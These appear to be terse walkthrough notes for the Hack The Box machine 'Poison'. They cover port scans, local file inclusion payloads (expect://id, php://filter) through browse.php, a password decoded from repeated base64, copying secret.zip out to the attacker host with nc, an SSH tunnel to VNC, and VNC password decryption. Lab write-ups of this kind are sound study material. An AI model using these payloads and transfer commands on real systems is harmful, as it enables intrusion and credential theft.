echo "10.129.1.254 poison.htb" | sudo tee -a /etc/hosts

nmap -sC -sV -O -oA initial 10.129.1.254

nmap -sC -sV -p- -oA full 10.129.1.254

#udp scan nmap -sU -p- -oA udp 10.129.1.254

rustscan --accessible -a poison.htb -r 1-65535 -- -sT -sV -sC -Pn

Pasted image 20210304201014.png

Vamos a http://10.129.1.254/browse.php?file=listfiles.php

Pasted image 20210304204136.png

Vamos a http://10.129.1.254/browse.php?file=pwdbackup.txt

Pasted image 20210304205440.png

expect://id

Pasted image 20210304205457.png

php://filter/convert.base64-encode/resource=[file-name]

Pasted image 20210304205510.png

#!/bin/bash# secret.txt contains encoded text secret=$(<secret.txt)for i in {1..13}; do secret=$(<<<"$secret" base64 --decode) done echo "$secret"

Charix!2#4%6&8(0

Pasted image 20210304205549.png

ssh charix@poison.htb

Pasted image 20210304205610.png

nc -lvnp 443

nc 10.10.14.135 443 < secret.zip

Vamos a http://10.129.1.254/browse.php?file=/var/log/http-access.log

ps -auxww | grep vnc

Pasted image 20210304205630.png

netstat -an | grep LIST

Pasted image 20210304205647.png

ssh -L 5000:127.0.0.1:5901 charix@10.129.1.254

Pasted image 20210304205704.png

netstat -an |grep LIST

Pasted image 20210304205711.png

https://github.com/jeroennijhof/vncpwd $ ./vncpwd ../secret Password: VNCP@$$!

Pasted image 20210304205732.png

boxes

copyright©2022 Cu3rv0x all rights reserved